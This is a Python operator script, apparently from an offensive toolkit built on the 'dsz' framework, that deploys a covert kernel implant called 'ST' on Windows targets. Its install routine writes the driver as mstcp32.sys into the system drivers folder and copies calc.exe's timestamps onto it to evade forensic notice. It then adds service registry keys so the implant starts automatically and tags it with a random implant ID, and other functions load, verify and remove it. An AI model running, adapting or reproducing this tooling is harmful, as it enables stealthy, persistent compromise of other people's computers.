305 lines
No EOL
16 KiB
Python
305 lines
No EOL
16 KiB
Python
|
|
import ops, ops.menu, ops.data, ops.cmd
|
|
import dsz, dsz.ui, dsz.version, dsz.windows
|
|
import os.path
|
|
from random import randint
|
|
stVersion = '1.14'
|
|
|
|
def getimplantID():
|
|
id = int(randint(0, 4294967295L))
|
|
return id
|
|
|
|
def regadd(regaddcommand):
|
|
value = None
|
|
if ('value' in regaddcommand.optdict):
|
|
value = regaddcommand.optdict['value']
|
|
else:
|
|
value = regaddcommand.optdict['key']
|
|
(safe, reason) = regaddcommand.safetyCheck()
|
|
if (not safe):
|
|
dsz.ui.Echo(('Cannot execute the registryadd command (for value %s) because of a failed safety check: \n%s' % (value, reason)), dsz.ERROR)
|
|
return 0
|
|
regaddres = regaddcommand.execute()
|
|
if regaddcommand.success:
|
|
dsz.ui.Echo(('Successfully added %s key.' % value), dsz.GOOD)
|
|
return 1
|
|
else:
|
|
dsz.ui.Echo(('Failed to add %s key!' % value), dsz.ERROR)
|
|
return 0
|
|
|
|
def install(passed_menu=None):
|
|
optdict = passed_menu.all_states()
|
|
if verifyinstalled(passed_menu):
|
|
dsz.ui.Echo('ST looks like it is already installed!', dsz.ERROR)
|
|
return 0
|
|
drivername = optdict['Configuration']['Driver Name']
|
|
implantID = optdict['Configuration']['Implant ID']
|
|
dsz.ui.Echo(('==Installing %s==' % drivername), dsz.WARNING)
|
|
localdriverpath = os.path.join(ops.RESDIR, 'ST1.14', 'mstcp32.sys')
|
|
if verifydriver(passed_menu):
|
|
if (not dsz.ui.Prompt('Do you wish to continue?', False)):
|
|
return 0
|
|
else:
|
|
putcmd = ops.cmd.getDszCommand(('put %s -name %s -permanent' % (localdriverpath, os.path.join(dsz.path.windows.GetSystemPath(), 'drivers', ('%s.sys' % drivername)))))
|
|
(safe, reason) = putcmd.safetyCheck()
|
|
if (not safe):
|
|
dsz.ui.Echo(('Cannot execute the put command because of a failed safety check: \n%s' % reason), dsz.ERROR)
|
|
if (not dsz.ui.Prompt('Do you wish to continue?', False)):
|
|
return 0
|
|
putres = putcmd.execute()
|
|
if putcmd.success:
|
|
dsz.ui.Echo(('Successfully put ST up as %s.' % drivername), dsz.GOOD)
|
|
else:
|
|
dsz.ui.Echo(('Put of ST as %s failed!' % drivername), dsz.ERROR)
|
|
if (not dsz.ui.Prompt('Do you wish to continue?', False)):
|
|
return 0
|
|
matchfiletimescmd = ops.cmd.getDszCommand('matchfiletimes', src=os.path.join(dsz.path.windows.GetSystemPath(), 'calc.exe'), dst=os.path.join(dsz.path.windows.GetSystemPath(), 'drivers', ('%s.sys' % drivername)))
|
|
(safe, reason) = matchfiletimescmd.safetyCheck()
|
|
if (not safe):
|
|
dsz.ui.Echo(('Cannot execute the matchfiletimes command because of a failed safety check: \n%s' % reason), dsz.ERROR)
|
|
if (not dsz.ui.Prompt('Do you wish to continue?', False)):
|
|
return 0
|
|
matchfiletimesres = matchfiletimescmd.execute()
|
|
if matchfiletimescmd.success:
|
|
dsz.ui.Echo('Successfully matchfiletimes ST against calc.exe.', dsz.GOOD)
|
|
else:
|
|
dsz.ui.Echo('Failed to matchfiletimes ST against calc.exe!', dsz.ERROR)
|
|
if (not dsz.ui.Prompt('Do you wish to continue?', False)):
|
|
return 0
|
|
if (not regadd(ops.cmd.getDszCommand('registryadd', hive='l', key=('system\\CurrentControlSet\\Services\\%s' % drivername)))):
|
|
dsz.ui.Echo('Failed to add key, verify installation!', dsz.ERROR)
|
|
if (not dsz.ui.Prompt('Do you wish to continue?', False)):
|
|
return 0
|
|
if (not regadd(ops.cmd.getDszCommand('registryadd', hive='l', key=('system\\CurrentControlSet\\Services\\%s' % drivername), value='ErrorControl', type='REG_DWORD', data='0'))):
|
|
dsz.ui.Echo('Failed to add key, verify installation!', dsz.ERROR)
|
|
if (not dsz.ui.Prompt('Do you wish to continue?', False)):
|
|
return 0
|
|
if (not regadd(ops.cmd.getDszCommand('registryadd', hive='l', key=('system\\CurrentControlSet\\Services\\%s' % drivername), value='Start', type='REG_DWORD', data='2'))):
|
|
dsz.ui.Echo('Failed to add key, verify installation!', dsz.ERROR)
|
|
if (not dsz.ui.Prompt('Do you wish to continue?', False)):
|
|
return 0
|
|
if (not regadd(ops.cmd.getDszCommand('registryadd', hive='l', key=('system\\CurrentControlSet\\Services\\%s' % drivername), value='Type', type='REG_DWORD', data='1'))):
|
|
dsz.ui.Echo('Failed to add key, verify installation!', dsz.ERROR)
|
|
if (not dsz.ui.Prompt('Do you wish to continue?', False)):
|
|
return 0
|
|
if (not regadd(ops.cmd.getDszCommand('registryadd', hive='l', key=('system\\CurrentControlSet\\Services\\%s' % drivername), value='Options', type='REG_BINARY', data='"0a 00 00 00 40 01 00 00 06 00 00 00 21 00 00 00 04 00 00 00 00 02 00 00 01 00 00 00 21 00 00 00 00 00 00 00 06 04 00 00 cb 34 00 00 00 07 00 00 00 00 00 00 21 00 00 00 00 00 00 00 06 04 00 00 34 cb 00 00 20 05 0a 00 01 00 00 00 00 06 00 00 01 00 00 00"'))):
|
|
dsz.ui.Echo('Failed to add key, verify installation!', dsz.ERROR)
|
|
if (not dsz.ui.Prompt('Do you wish to continue?', False)):
|
|
return 0
|
|
if (not regadd(ops.cmd.getDszCommand('registryadd', hive='l', key=('system\\CurrentControlSet\\Services\\%s' % drivername), value='Params', type='REG_DWORD', data=('"0x%08x"' % implantID)))):
|
|
dsz.ui.Echo('Failed to add key, verify installation!', dsz.ERROR)
|
|
if (not dsz.ui.Prompt('Do you wish to continue?', False)):
|
|
return 0
|
|
if (not verifyinstalled(passed_menu)):
|
|
dsz.ui.Echo('ST failed to install properly!', dsz.ERROR)
|
|
return 0
|
|
else:
|
|
dsz.ui.Echo("ST installed properly! Don't forget to load the driver, if necessary.", dsz.GOOD)
|
|
return 1
|
|
|
|
def uninstall(passed_menu=None):
|
|
optdict = passed_menu.all_states()
|
|
drivername = optdict['Configuration']['Driver Name']
|
|
dsz.ui.Echo(('==Uninstalling %s==' % drivername), dsz.WARNING)
|
|
if (not verifyinstalled(passed_menu)):
|
|
dsz.ui.Echo("ST doesn't seem to be properly installed!", dsz.ERROR)
|
|
if (not dsz.ui.Prompt('Do you wish to continue?', False)):
|
|
return 0
|
|
if verifyrunning(passed_menu):
|
|
dsz.ui.Echo('ST running, attempting to unload.')
|
|
if (not unload(passed_menu)):
|
|
dsz.ui.Echo('Could not unload ST!', dsz.ERROR)
|
|
if (not dsz.ui.Prompt('Do you wish to continue?', False)):
|
|
return 0
|
|
else:
|
|
dsz.ui.Echo('Successfully unload ST', dsz.GOOD)
|
|
deletecmd = ops.cmd.getDszCommand('delete', file=os.path.join(dsz.path.windows.GetSystemPath(), 'drivers', ('%s.sys' % drivername)))
|
|
(safe, reason) = deletecmd.safetyCheck()
|
|
if (not safe):
|
|
dsz.ui.Echo(('Cannot execute the delete command because of a failed safety check: \n%s' % reason), dsz.ERROR)
|
|
if (not dsz.ui.Prompt('Do you wish to continue?', False)):
|
|
return 0
|
|
deleteres = deletecmd.execute()
|
|
if (not deletecmd.success):
|
|
dsz.ui.Echo(('Could not delete ST driver (%s)!.' % drivername), dsz.ERROR)
|
|
if (not dsz.ui.Prompt('Do you wish to continue?', False)):
|
|
return 0
|
|
else:
|
|
dsz.ui.Echo(('Delete of ST driver (%s) successful.' % drivername), dsz.GOOD)
|
|
regdelcmd = ops.cmd.getDszCommand('registrydelete', hive='l', key=('system\\CurrentControlSet\\Services\\%s' % drivername), recursive=True)
|
|
(safe, reason) = regdelcmd.safetyCheck()
|
|
if (not safe):
|
|
dsz.ui.Echo(('Cannot execute the registrydelete command because of a failed safety check: \n%s' % reason), dsz.ERROR)
|
|
if (not dsz.ui.Prompt('Do you wish to continue?', False)):
|
|
return 0
|
|
regdelres = regdelcmd.execute()
|
|
if (not regdelcmd.success):
|
|
dsz.ui.Echo('Could not delete the ST registry keys!.', dsz.ERROR)
|
|
else:
|
|
dsz.ui.Echo('Delete of ST registry keys successful.', dsz.GOOD)
|
|
if (not dsz.ui.Prompt('Do you wish to continue?', False)):
|
|
return 0
|
|
if (not verifyinstalled(passed_menu)):
|
|
dsz.ui.Echo('ST successfully uninstalled!', dsz.GOOD)
|
|
return 1
|
|
else:
|
|
dsz.ui.Echo('ST uninstall failed!', dsz.ERROR)
|
|
return 0
|
|
|
|
def load(passed_menu=None):
|
|
optdict = passed_menu.all_states()
|
|
drivername = optdict['Configuration']['Driver Name']
|
|
dsz.ui.Echo(('==Loading %s==' % drivername), dsz.WARNING)
|
|
drivercmd = ops.cmd.getDszCommand('drivers', load=drivername)
|
|
(safe, reason) = drivercmd.safetyCheck()
|
|
if (not safe):
|
|
dsz.ui.Echo(('Cannot execute the load command because of a failed safety check: \n%s' % reason), dsz.ERROR)
|
|
return 0
|
|
driverres = drivercmd.execute()
|
|
if (not drivercmd.success):
|
|
dsz.ui.Echo(('Driver %s was NOT successfully loaded!' % drivername), dsz.ERROR)
|
|
return 0
|
|
else:
|
|
dsz.ui.Echo(('Driver %s was successfully loaded!' % drivername), dsz.GOOD)
|
|
return 1
|
|
verifyrunning(passed_menu)
|
|
|
|
def unload(passed_menu=None):
|
|
optdict = passed_menu.all_states()
|
|
drivername = optdict['Configuration']['Driver Name']
|
|
dsz.ui.Echo(('==Unloading %s==' % drivername), dsz.WARNING)
|
|
drivercmd = ops.cmd.getDszCommand('drivers', unload=drivername)
|
|
(safe, reason) = drivercmd.safetyCheck()
|
|
if (not safe):
|
|
dsz.ui.Echo(('Cannot execute the unload command because of a failed safety check: \n%s' % reason), dsz.ERROR)
|
|
return 0
|
|
driverres = drivercmd.execute()
|
|
if (not drivercmd.success):
|
|
dsz.ui.Echo(('Driver %s was NOT successfully unloaded!' % drivername), dsz.ERROR)
|
|
return 0
|
|
else:
|
|
dsz.ui.Echo(('Driver %s was successfully unloaded!' % drivername), dsz.GOOD)
|
|
return 1
|
|
verifyrunning(passed_menu)
|
|
|
|
def verifydriver(passed_menu=None):
|
|
optdict = passed_menu.all_states()
|
|
drivername = optdict['Configuration']['Driver Name']
|
|
dsz.ui.Echo(('==Checking to see driver %s exists on disk==' % drivername), dsz.WARNING)
|
|
permissionscmd = ops.cmd.getDszCommand('permissions', file=os.path.join(dsz.path.windows.GetSystemPath(), 'drivers', ('%s.sys' % drivername)))
|
|
(safe, reason) = permissionscmd.safetyCheck()
|
|
if (not safe):
|
|
dsz.ui.Echo(('Cannot execute the permissions command because of a failed safety check: \n%s' % reason), dsz.ERROR)
|
|
if (not dsz.ui.Prompt('Do you wish to continue?', False)):
|
|
return 0
|
|
permissionsres = permissionscmd.execute()
|
|
if (not permissionscmd.success):
|
|
dsz.ui.Echo(("ST driver (%s) doesn't exist!" % drivername), dsz.ERROR)
|
|
return 0
|
|
else:
|
|
dsz.ui.Echo(('ST driver (%s) exists.' % drivername), dsz.GOOD)
|
|
return 1
|
|
|
|
def verifyinstalled(passed_menu=None):
|
|
optdict = passed_menu.all_states()
|
|
drivername = optdict['Configuration']['Driver Name']
|
|
verifydriver(passed_menu)
|
|
returnvalue = 1
|
|
dsz.ui.Echo(('==Checking to see if all reg keys for %s exist==' % drivername), dsz.WARNING)
|
|
regcmd = ops.cmd.getDszCommand('registryquery', hive='L', key=('system\\CurrentControlSet\\Services\\%s' % drivername))
|
|
regres = regcmd.execute()
|
|
if (regcmd.success == 0):
|
|
dsz.ui.Echo("Driver key doesn't exist", dsz.ERROR)
|
|
return 0
|
|
regcmd = ops.cmd.getDszCommand('registryquery', hive='L', key=('system\\CurrentControlSet\\Services\\%s' % drivername), value='ErrorControl')
|
|
regres = regcmd.execute()
|
|
if (regcmd.success == 0):
|
|
dsz.ui.Echo("ErrorControl key doesn't exist", dsz.ERROR)
|
|
returnvalue = 0
|
|
elif (not (regres.key[0].value[0].value == '0')):
|
|
dsz.ui.Echo('ErrorControl key not set correctly', dsz.ERROR)
|
|
returnvalue = 0
|
|
regcmd = ops.cmd.getDszCommand('registryquery', hive='L', key=('system\\CurrentControlSet\\Services\\%s' % drivername), value='Start')
|
|
regres = regcmd.execute()
|
|
if (regcmd.success == 0):
|
|
dsz.ui.Echo("Start key doesn't exist", dsz.ERROR)
|
|
returnvalue = 0
|
|
elif (not (regres.key[0].value[0].value == '2')):
|
|
dsz.ui.Echo('Start key not set correctly', dsz.ERROR)
|
|
returnvalue = 0
|
|
regcmd = ops.cmd.getDszCommand('registryquery', hive='L', key=('system\\CurrentControlSet\\Services\\%s' % drivername), value='Type')
|
|
regres = regcmd.execute()
|
|
if (regcmd.success == 0):
|
|
dsz.ui.Echo("Type key doesn't exist", dsz.ERROR)
|
|
returnvalue = 0
|
|
elif (not (regres.key[0].value[0].value == '1')):
|
|
dsz.ui.Echo('Type key not set correctly', dsz.ERROR)
|
|
returnvalue = 0
|
|
regcmd = ops.cmd.getDszCommand('registryquery', hive='L', key=('system\\CurrentControlSet\\Services\\%s' % drivername), value='Options')
|
|
regres = regcmd.execute()
|
|
if (regcmd.success == 0):
|
|
dsz.ui.Echo("Options key doesn't exist", dsz.ERROR)
|
|
returnvalue = 0
|
|
elif (not (regres.key[0].value[0].value == '0a000000400100000600000021000000040000000002000001000000210000000000000006040000cb340000000700000000000021000000000000000604000034cb000020050a00010000000006000001000000')):
|
|
dsz.ui.Echo('Options key not set correctly', dsz.ERROR)
|
|
returnvalue = 0
|
|
regcmd = ops.cmd.getDszCommand('registryquery', hive='L', key=('system\\CurrentControlSet\\Services\\%s' % drivername), value='Params')
|
|
regres = regcmd.execute()
|
|
if (regcmd.success == 0):
|
|
dsz.ui.Echo("Params key doesn't exist", dsz.ERROR)
|
|
returnvalue = 0
|
|
else:
|
|
installedImplantID = regres.key[0].value[0].value
|
|
dsz.ui.Echo(('ST implant ID (Params): %s' % installedImplantID), dsz.GOOD)
|
|
if returnvalue:
|
|
dsz.ui.Echo('All ST keys exist with expected values', dsz.GOOD)
|
|
else:
|
|
dsz.ui.Echo('Some ST keys were missing or had unexpected values', dsz.ERROR)
|
|
return returnvalue
|
|
|
|
def verifyrunning(passed_menu=None):
|
|
optdict = passed_menu.all_states()
|
|
drivername = optdict['Configuration']['Driver Name']
|
|
dsz.ui.Echo(('==Checking to see if %s is running==' % drivername), dsz.WARNING)
|
|
if dsz.windows.driver.VerifyRunning(drivername):
|
|
dsz.ui.Echo('ST driver running.', dsz.GOOD)
|
|
return 1
|
|
else:
|
|
dsz.ui.Echo('ST driver NOT running!', dsz.ERROR)
|
|
return 0
|
|
|
|
def main():
|
|
ops.preload('registryquery')
|
|
ops.preload('drivers')
|
|
ops.preload('put')
|
|
ops.preload('matchfiletimes')
|
|
ops.preload('registryadd')
|
|
ops.preload('registrydelete')
|
|
ops.preload('delete')
|
|
if (not dsz.version.checks.windows.Is2000OrGreater()):
|
|
dsz.ui.Echo('Target is pre Windows 2000! Cannot install, educate yourself', dsz.ERROR)
|
|
return 0
|
|
if dsz.version.checks.IsOs64Bit():
|
|
dsz.ui.Echo('Target is x64! Cannot install, educate yourself', dsz.ERROR)
|
|
return 0
|
|
if dsz.version.checks.windows.IsVistaOrGreater():
|
|
dsz.ui.Echo('Target is Vista+! Cannot install, educate yourself', dsz.ERROR)
|
|
return 0
|
|
st_menu = ops.menu.Menu()
|
|
implantid = getimplantID()
|
|
drivername = 'mstcp32'
|
|
st_menu.set_heading(('ST %s installation menu' % stVersion))
|
|
st_menu.add_str_option(option='Driver Name', section='Configuration', state=drivername)
|
|
st_menu.add_hex_option(option='Implant ID', section='Configuration', state=implantid)
|
|
st_menu.add_option(option='Install Driver', section='Installation', callback=install, passed_menu=st_menu)
|
|
st_menu.add_option(option='Load Driver', section='Installation', callback=load, passed_menu=st_menu)
|
|
st_menu.add_option(option='Verify Installation', section='Installation', callback=verifyinstalled, passed_menu=st_menu)
|
|
st_menu.add_option(option='Verify Running', section='Installation', callback=verifyrunning, passed_menu=st_menu)
|
|
st_menu.add_option(option='Uninstall ST', section='Uninstall', callback=uninstall, passed_menu=st_menu)
|
|
st_menu.add_option(option='Unload Driver', section='Uninstall', callback=unload, passed_menu=st_menu)
|
|
st_menu.execute(exiton=[0], default=0)
|
|
if (__name__ == '__main__'):
|
|
try:
|
|
main()
|
|
except RuntimeError as e:
|
|
dsz.ui.Echo(('\nCaught RuntimeError: %s' % e), dsz.ERROR) |